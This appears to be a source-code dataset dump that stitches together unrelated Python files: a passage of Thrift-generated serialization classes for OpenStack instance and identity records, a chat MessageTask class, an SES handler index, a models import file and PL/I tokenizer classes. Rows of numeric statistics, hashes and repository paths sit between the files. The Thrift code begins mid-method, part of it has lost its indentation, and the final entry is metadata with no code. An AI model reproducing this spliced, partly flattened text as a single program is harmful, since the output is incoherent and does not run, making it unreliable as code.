if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.uuid = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.name = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.hash = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.options = {}
(_ktype10, _vtype11, _size9 ) = iprot.readMapBegin()
for _i13 in xrange(_size9):
_key14 = iprot.readString().decode('utf-8')
_val15 = iprot.readString().decode('utf-8')
self.options[_key14] = _val15
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.time = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Identity')
if self.uuid is not None:
oprot.writeFieldBegin('uuid', TType.STRING, 1)
oprot.writeString(self.uuid.encode('utf-8'))
oprot.writeFieldEnd()
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 2)
oprot.writeString(self.name.encode('utf-8'))
oprot.writeFieldEnd()
if self.hash is not None:
oprot.writeFieldBegin('hash', TType.STRING, 3)
oprot.writeString(self.hash.encode('utf-8'))
oprot.writeFieldEnd()
if self.options is not None:
oprot.writeFieldBegin('options', TType.MAP, 4)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.options))
for kiter16,viter17 in self.options.items():
oprot.writeString(kiter16.encode('utf-8'))
oprot.writeString(viter17.encode('utf-8'))
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.time is not None:
oprot.writeFieldBegin('time', TType.I32, 5)
oprot.writeI32(self.time)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.uuid is None:
raise TProtocol.TProtocolException(message='Required field uuid is unset!')
if self.options is None:
raise TProtocol.TProtocolException(message='Required field options is unset!')
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.uuid)
value = (value * 31) ^ hash(self.name)
value = (value * 31) ^ hash(self.hash)
value = (value * 31) ^ hash(self.options)
value = (value * 31) ^ hash(self.time)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Instance(object):
"""
Attributes:
- uuid
- machine_uuid
- name
- public_addresses
- private_addresses
- extra
- project_id
- provider_hash
- identity_hash
- time
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'uuid', None, None, ), # 1
(2, TType.STRING, 'machine_uuid', None, None, ), # 2
(3, TType.STRING, 'name', None, None, ), # 3
(4, TType.LIST, 'public_addresses', (TType.STRING,None), None, ), # 4
(5, TType.LIST, 'private_addresses', (TType.STRING,None), None, ), # 5
(6, TType.STRING, 'extra', None, None, ), # 6
(7, TType.STRING, 'project_id', None, None, ), # 7
(8, TType.STRING, 'provider_hash', None, None, ), # 8
(9, TType.STRING, 'identity_hash', None, None, ), # 9
(10, TType.I32, 'time', None, None, ), # 10
)
def __init__(self, uuid=None, machine_uuid=None, name=None, public_addresses=None, private_addresses=None, extra=None, project_id=None, provider_hash=None, identity_hash=None, time=None,):
self.uuid = uuid
self.machine_uuid = machine_uuid
self.name = name
self.public_addresses = public_addresses
self.private_addresses = private_addresses
self.extra = extra
self.project_id = project_id
self.provider_hash = provider_hash
self.identity_hash = identity_hash
self.time = time
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.uuid = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.machine_uuid = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.name = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.LIST:
self.public_addresses = []
(_etype21, _size18) = iprot.readListBegin()
for _i22 in xrange(_size18):
_elem23 = iprot.readString().decode('utf-8')
self.public_addresses.append(_elem23)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.LIST:
self.private_addresses = []
(_etype27, _size24) = iprot.readListBegin()
for _i28 in xrange(_size24):
_elem29 = iprot.readString().decode('utf-8')
self.private_addresses.append(_elem29)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRING:
self.extra = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRING:
self.project_id = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.STRING:
self.provider_hash = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.STRING:
self.identity_hash = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I32:
self.time = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Instance')
if self.uuid is not None:
oprot.writeFieldBegin('uuid', TType.STRING, 1)
oprot.writeString(self.uuid.encode('utf-8'))
oprot.writeFieldEnd()
if self.machine_uuid is not None:
oprot.writeFieldBegin('machine_uuid', TType.STRING, 2)
oprot.writeString(self.machine_uuid.encode('utf-8'))
oprot.writeFieldEnd()
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 3)
oprot.writeString(self.name.encode('utf-8'))
oprot.writeFieldEnd()
if self.public_addresses is not None:
oprot.writeFieldBegin('public_addresses', TType.LIST, 4)
oprot.writeListBegin(TType.STRING, len(self.public_addresses))
for iter30 in self.public_addresses:
oprot.writeString(iter30.encode('utf-8'))
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.private_addresses is not None:
oprot.writeFieldBegin('private_addresses', TType.LIST, 5)
oprot.writeListBegin(TType.STRING, len(self.private_addresses))
for iter31 in self.private_addresses:
oprot.writeString(iter31.encode('utf-8'))
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.extra is not None:
oprot.writeFieldBegin('extra', TType.STRING, 6)
oprot.writeString(self.extra.encode('utf-8'))
oprot.writeFieldEnd()
if self.project_id is not None:
oprot.writeFieldBegin('project_id', TType.STRING, 7)
oprot.writeString(self.project_id.encode('utf-8'))
oprot.writeFieldEnd()
if self.provider_hash is not None:
oprot.writeFieldBegin('provider_hash', TType.STRING, 8)
oprot.writeString(self.provider_hash.encode('utf-8'))
oprot.writeFieldEnd()
if self.identity_hash is not None:
oprot.writeFieldBegin('identity_hash', TType.STRING, 9)
oprot.writeString(self.identity_hash.encode('utf-8'))
oprot.writeFieldEnd()
if self.time is not None:
oprot.writeFieldBegin('time', TType.I32, 10)
oprot.writeI32(self.time)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.uuid is None:
raise TProtocol.TProtocolException(message='Required field uuid is unset!')
if self.machine_uuid is None:
raise TProtocol.TProtocolException(message='Required field machine_uuid is unset!')
if self.provider_hash is None:
raise TProtocol.TProtocolException(message='Required field provider_hash is unset!')
if self.time is None:
raise TProtocol.TProtocolException(message='Required field time is unset!')
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.uuid)
value = (value * 31) ^ hash(self.machine_uuid)
value = (value * 31) ^ hash(self.name)
value = (value * 31) ^ hash(self.public_addresses)
value = (value * 31) ^ hash(self.private_addresses)
value = (value * 31) ^ hash(self.extra)
value = (value * 31) ^ hash(self.project_id)
value = (value * 31) ^ hash(self.provider_hash)
value = (value * 31) ^ hash(self.identity_hash)
value = (value * 31) ^ hash(self.time)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Instances(object):
  """
  Attributes:
   - instances
   - provider_hash
   - identity_hash
   - time
  """

  # Field metadata used by the (de)serializers; tuple index == field id.
  thrift_spec = (
    None, # 0
    (1, TType.LIST, 'instances', (TType.STRUCT,(Instance, Instance.thrift_spec)), None, ), # 1
    (2, TType.STRING, 'provider_hash', None, None, ), # 2
    (3, TType.STRING, 'identity_hash', None, None, ), # 3
    (4, TType.I32, 'time', None, None, ), # 4
  )

  def __init__(self, instances=None, provider_hash=None, identity_hash=None, time=None,):
    self.instances = instances
    self.provider_hash = provider_hash
    self.identity_hash = identity_hash
    self.time = time

  def read(self, iprot):
    """Deserialize this struct from iprot, one field at a time."""
    # Fast path: C-accelerated binary decoding when protocol/transport allow.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.LIST:
          # List of nested Instance structs.
          self.instances = []
          (_etype35, _size32) = iprot.readListBegin()
          for _i36 in xrange(_size32):
            _elem37 = Instance()
            _elem37.read(iprot)
            self.instances.append(_elem37)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.provider_hash = iprot.readString().decode('utf-8')
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.identity_hash = iprot.readString().decode('utf-8')
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.I32:
          self.time = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('Instances')
    if self.instances is not None:
      oprot.writeFieldBegin('instances', TType.LIST, 1)
      oprot.writeListBegin(TType.STRUCT, len(self.instances))
      for iter38 in self.instances:
        iter38.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.provider_hash is not None:
      oprot.writeFieldBegin('provider_hash', TType.STRING, 2)
      oprot.writeString(self.provider_hash.encode('utf-8'))
      oprot.writeFieldEnd()
    if self.identity_hash is not None:
      oprot.writeFieldBegin('identity_hash', TType.STRING, 3)
      oprot.writeString(self.identity_hash.encode('utf-8'))
      oprot.writeFieldEnd()
    if self.time is not None:
      oprot.writeFieldBegin('time', TType.I32, 4)
      oprot.writeI32(self.time)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    """Raise TProtocolException if a required field is missing."""
    # identity_hash is optional; the other three fields are required.
    if self.instances is None:
      raise TProtocol.TProtocolException(message='Required field instances is unset!')
    if self.provider_hash is None:
      raise TProtocol.TProtocolException(message='Required field provider_hash is unset!')
    if self.time is None:
      raise TProtocol.TProtocolException(message='Required field time is unset!')
    return

  def __hash__(self):
    # 17/31 polynomial hash over all fields in declared order.
    # NOTE(review): hash() of a populated list raises TypeError, so a
    # filled-in struct is effectively unhashable — generated code, left as-is.
    value = 17
    value = (value * 31) ^ hash(self.instances)
    value = (value * 31) ^ hash(self.provider_hash)
    value = (value * 31) ^ hash(self.identity_hash)
    value = (value * 31) ^ hash(self.time)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class OpenStackException(TException):
  """
  Attributes:
   - message
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'message', None, None, ), # 1
  )

  def __init__(self, message=None,):
    self.message = message

  def read(self, iprot):
    """Populate this exception from the wire, field by field."""
    # Prefer the C-accelerated decoder when the protocol/transport allow it.
    can_accelerate = (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                      and isinstance(iprot.trans, TTransport.CReadableTransport)
                      and self.thrift_spec is not None
                      and fastbinary is not None)
    if can_accelerate:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.STRING:
        self.message = iprot.readString().decode('utf-8')
      else:
        # Unknown or mistyped field: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this exception; an unset message is omitted."""
    # Prefer the C-accelerated encoder when available.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('OpenStackException')
    if self.message is not None:
      oprot.writeFieldBegin('message', TType.STRING, 1)
      oprot.writeString(self.message.encode('utf-8'))
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    """Ensure the required 'message' field has been set."""
    if self.message is None:
      raise TProtocol.TProtocolException(message='Required field message is unset!')
    return

  def __str__(self):
    return repr(self)

  def __hash__(self):
    # Single-field variant of the generated 17/31 hash scheme.
    return (17 * 31) ^ hash(self.message)

  def __repr__(self):
    attrs = ', '.join('%s=%r' % kv for kv in self.__dict__.iteritems())
    return '%s(%s)' % (self.__class__.__name__, attrs)

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class ConnectionException(TException):
  """
  Attributes:
   - message
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'message', None, None, ), # 1
  )

  def __init__(self, message=None,):
    self.message = message

  def read(self, iprot):
    """Populate this exception from the wire, field by field."""
    # Prefer the C-accelerated decoder when the protocol/transport allow it.
    can_accelerate = (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                      and isinstance(iprot.trans, TTransport.CReadableTransport)
                      and self.thrift_spec is not None
                      and fastbinary is not None)
    if can_accelerate:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.STRING:
        self.message = iprot.readString().decode('utf-8')
      else:
        # Unknown or mistyped field: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this exception; an unset message is omitted."""
    # Prefer the C-accelerated encoder when available.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('ConnectionException')
    if self.message is not None:
      oprot.writeFieldBegin('message', TType.STRING, 1)
      oprot.writeString(self.message.encode('utf-8'))
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    """Ensure the required 'message' field has been set."""
    if self.message is None:
      raise TProtocol.TProtocolException(message='Required field message is unset!')
    return

  def __str__(self):
    return repr(self)

  def __hash__(self):
    # Single-field variant of the generated 17/31 hash scheme.
    return (17 * 31) ^ hash(self.message)

  def __repr__(self):
    attrs = ', '.join('%s=%r' % kv for kv in self.__dict__.iteritems())
    return '%s(%s)' % (self.__class__.__name__, attrs)

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class DeployException(TException):
  """
  Attributes:
   - message
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'message', None, None, ), # 1
  )

  def __init__(self, message=None,):
    self.message = message

  def read(self, iprot):
    """Populate this exception from the wire, field by field."""
    # Prefer the C-accelerated decoder when the protocol/transport allow it.
    can_accelerate = (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                      and isinstance(iprot.trans, TTransport.CReadableTransport)
                      and self.thrift_spec is not None
                      and fastbinary is not None)
    if can_accelerate:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.STRING:
        self.message = iprot.readString().decode('utf-8')
      else:
        # Unknown or mistyped field: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this exception; an unset message is omitted."""
    # Prefer the C-accelerated encoder when available.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('DeployException')
    if self.message is not None:
      oprot.writeFieldBegin('message', TType.STRING, 1)
      oprot.writeString(self.message.encode('utf-8'))
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    """Ensure the required 'message' field has been set."""
    if self.message is None:
      raise TProtocol.TProtocolException(message='Required field message is unset!')
    return

  def __str__(self):
    return repr(self)

  def __hash__(self):
    # Single-field variant of the generated 17/31 hash scheme.
    return (17 * 31) ^ hash(self.message)

  def __repr__(self):
    attrs = ', '.join('%s=%r' % kv for kv in self.__dict__.iteritems())
    return '%s(%s)' % (self.__class__.__name__, attrs)

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
| 33.253676
| 190
| 0.640354
| 3,278
| 27,135
| 5.114704
| 0.055522
| 0.043302
| 0.029524
| 0.036502
| 0.877967
| 0.852261
| 0.818144
| 0.808899
| 0.801086
| 0.791304
| 0
| 0.017588
| 0.233094
| 27,135
| 815
| 191
| 33.294479
| 0.788083
| 0.022591
| 0
| 0.807692
| 1
| 0
| 0.048425
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.087278
| false
| 0
| 0.005917
| 0.025148
| 0.190828
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
92cb7eb567923b4d773c0710fe191f961ac23666
| 290
|
py
|
Python
|
Model/MessageTask.py
|
anubizra/chat-inator
|
df021f0d374a25213358d7408c39813526e99e6c
|
[
"MIT"
] | null | null | null |
Model/MessageTask.py
|
anubizra/chat-inator
|
df021f0d374a25213358d7408c39813526e99e6c
|
[
"MIT"
] | null | null | null |
Model/MessageTask.py
|
anubizra/chat-inator
|
df021f0d374a25213358d7408c39813526e99e6c
|
[
"MIT"
] | null | null | null |
class MessageTask(object):
    """A chat message queued for delivery on a channel."""

    def __init__(self, message_channel, user_name, message):
        # Target channel, the author's name, and the raw message text.
        self.message_channel = message_channel
        self.user_name = user_name
        self.message = message

    def get_message(self):
        """Return the message rendered as '<user_name>:<message>'."""
        return '%s:%s' % (self.user_name, self.message)
| 29
| 60
| 0.675862
| 35
| 290
| 5.257143
| 0.371429
| 0.23913
| 0.195652
| 0.206522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.217241
| 290
| 9
| 61
| 32.222222
| 0.810573
| 0
| 0
| 0
| 0
| 0
| 0.017241
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
92e3b7a1e3602eeca965b3df415b1e527ba41e7f
| 182
|
py
|
Python
|
index.py
|
OmniPro-Group/aws-cfn-ses-domain
|
3385864e800749abbd9fc4bf4aa2d6735087bd67
|
[
"Apache-2.0"
] | 35
|
2019-12-11T02:49:27.000Z
|
2022-03-31T07:56:00.000Z
|
index.py
|
OmniPro-Group/aws-cfn-ses-domain
|
3385864e800749abbd9fc4bf4aa2d6735087bd67
|
[
"Apache-2.0"
] | 10
|
2019-08-28T21:42:40.000Z
|
2022-01-07T00:15:40.000Z
|
index.py
|
OmniPro-Group/aws-cfn-ses-domain
|
3385864e800749abbd9fc4bf4aa2d6735087bd67
|
[
"Apache-2.0"
] | 15
|
2019-08-16T22:28:52.000Z
|
2022-03-24T10:15:14.000Z
|
from aws_cfn_ses_domain import handle_domain_identity_request, handle_email_identity_request

# Re-export the two handler functions as this module's public API.
# NOTE(review): presumably these serve as Lambda entry points referenced as
# "index.<name>" — confirm against the deployment template.
__all__ = [
    'handle_domain_identity_request',
    'handle_email_identity_request',
]
| 30.333333
| 92
| 0.840659
| 23
| 182
| 5.826087
| 0.478261
| 0.447761
| 0.298507
| 0.402985
| 0.791045
| 0.791045
| 0.791045
| 0.791045
| 0
| 0
| 0
| 0
| 0.104396
| 182
| 5
| 93
| 36.4
| 0.822086
| 0
| 0
| 0
| 0
| 0
| 0.324176
| 0.324176
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
13314e16cb16e274106118eff89b8dbcfa9f83cb
| 244
|
py
|
Python
|
attributes/models/__init__.py
|
pmaigutyak/mp-shop
|
14ea67f71fd91a282d2070414924708214fc6464
|
[
"0BSD"
] | 2
|
2018-03-14T11:32:36.000Z
|
2021-09-25T14:31:36.000Z
|
attributes/models/__init__.py
|
pmaigutyak/mp-shop
|
14ea67f71fd91a282d2070414924708214fc6464
|
[
"0BSD"
] | null | null | null |
attributes/models/__init__.py
|
pmaigutyak/mp-shop
|
14ea67f71fd91a282d2070414924708214fc6464
|
[
"0BSD"
] | null | null | null |
from attributes.models.attribute import Attribute
from attributes.models.attribute_option import AttributeOption
from attributes.models.attribute_value import AttributeValue, VALUE_FIELDS
from attributes.models.service import AttributeService
| 40.666667
| 74
| 0.889344
| 28
| 244
| 7.642857
| 0.428571
| 0.261682
| 0.373832
| 0.406542
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07377
| 244
| 5
| 75
| 48.8
| 0.946903
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
137241ee23f65803961b1c807dd7cc52187a3efc
| 2,470
|
py
|
Python
|
pl1_token_builders.py
|
jfitz/code-stat
|
dd2a13177f3ef03ab42123ef3cfcbbd062a2ae26
|
[
"MIT"
] | null | null | null |
pl1_token_builders.py
|
jfitz/code-stat
|
dd2a13177f3ef03ab42123ef3cfcbbd062a2ae26
|
[
"MIT"
] | null | null | null |
pl1_token_builders.py
|
jfitz/code-stat
|
dd2a13177f3ef03ab42123ef3cfcbbd062a2ae26
|
[
"MIT"
] | null | null | null |
from codestat_token import Token
from token_builders import TokenBuilder
# token reader for label
class PL1LabelTokenBuilder(TokenBuilder):

    @staticmethod
    def __escape_z__():
        Token.__escape_z__()
        return 'Escape ?Z'

    def __init__(self):
        self.text = None

    def get_tokens(self):
        """Return the accumulated text as a single 'label' token."""
        if self.text is None:
            return None
        return [Token(self.text, 'label', False)]

    def accept(self, candidate, c):
        """Accept letters, then letters/digits, terminated by a single ':'."""
        # The very first character must be alphabetic.
        if len(candidate) <= 1:
            return c.isalpha()
        # Once the terminating ':' has been consumed, nothing more fits.
        if candidate[-1] == ':':
            return False
        return c.isalpha() or c.isdigit() or c == ':'
# token reader for start comment
class PL1CommentStartTokenBuilder(TokenBuilder):

    @staticmethod
    def __escape_z__():
        Token.__escape_z__()
        return 'Escape ?Z'

    def __init__(self):
        self.text = ''

    def get_tokens(self):
        """Return the accumulated text as a single 'comment-start' token."""
        if self.text is None:
            return None
        return [Token(self.text, 'comment-start', False)]

    def accept(self, candidate, c):
        """Require '/', then '*', then anything until '*/' closes it."""
        expected_prefix = {0: '/', 1: '*'}
        position = len(candidate)
        if position in expected_prefix:
            return c == expected_prefix[position]
        return not candidate.endswith('*/')

    def get_score(self, line_printable_tokens):
        """Score an unterminated '/*...' by its length; anything else scores 0."""
        text = self.text
        if text is None:
            return 0
        is_open_comment = text.startswith('/*') and not text.endswith('*/')
        return len(text) if is_open_comment else 0
# token reader for middle comment
class PL1CommentMiddleTokenBuilder(TokenBuilder):

    @staticmethod
    def __escape_z__():
        Token.__escape_z__()
        return 'Escape ?Z'

    def __init__(self):
        self.text = ''

    def get_tokens(self):
        """Return the accumulated text as a single 'comment-middle' token."""
        if self.text is None:
            return None
        return [Token(self.text, 'comment-middle', False)]

    def accept(self, candidate, c):
        # Keep consuming until the terminator '*/' has been seen.
        return not candidate.endswith('*/')

    def get_score(self, line_printable_tokens):
        """Score text that does NOT end in '*/' by its length; else 0."""
        text = self.text
        if text is None:
            return 0
        return 0 if text.endswith('*/') else len(text)
# token reader for end comment
class PL1CommentEndTokenBuilder(TokenBuilder):

    @staticmethod
    def __escape_z__():
        Token.__escape_z__()
        return 'Escape ?Z'

    def __init__(self):
        self.text = ''

    def get_tokens(self):
        """Return the accumulated text as a single 'comment-end' token."""
        if self.text is None:
            return None
        return [Token(self.text, 'comment-end', False)]

    def accept(self, candidate, c):
        # Keep consuming until the terminator '*/' has been seen.
        return not candidate.endswith('*/')

    def get_score(self, line_printable_tokens):
        """Score text that DOES end in '*/' by its length; else 0."""
        text = self.text
        if text is None:
            return 0
        return len(text) if text.endswith('*/') else 0
| 18.854962
| 67
| 0.648988
| 319
| 2,470
| 4.802508
| 0.15047
| 0.114883
| 0.058747
| 0.05483
| 0.770235
| 0.76893
| 0.740862
| 0.740862
| 0.740862
| 0.665144
| 0
| 0.007907
| 0.231984
| 2,470
| 130
| 68
| 19
| 0.799684
| 0.046154
| 0
| 0.7125
| 0
| 0
| 0.041259
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2375
| false
| 0
| 0.025
| 0.025
| 0.675
| 0.0375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
13b3580b216367d94ebd4e485b997853f46a713f
| 3,913
|
py
|
Python
|
testing/lastrun.py
|
petrkr/mpy-qr
|
eef6e4d89384a6ec2b09336b8bf7812040934056
|
[
"MIT"
] | 3
|
2020-06-08T20:36:41.000Z
|
2021-12-31T20:09:03.000Z
|
testing/lastrun.py
|
petrkr/mpy-qr
|
eef6e4d89384a6ec2b09336b8bf7812040934056
|
[
"MIT"
] | 4
|
2020-09-10T22:11:12.000Z
|
2022-02-19T18:06:32.000Z
|
testing/lastrun.py
|
petrkr/mpy-qr
|
eef6e4d89384a6ec2b09336b8bf7812040934056
|
[
"MIT"
] | 2
|
2021-12-28T16:25:15.000Z
|
2021-12-31T20:09:07.000Z
|
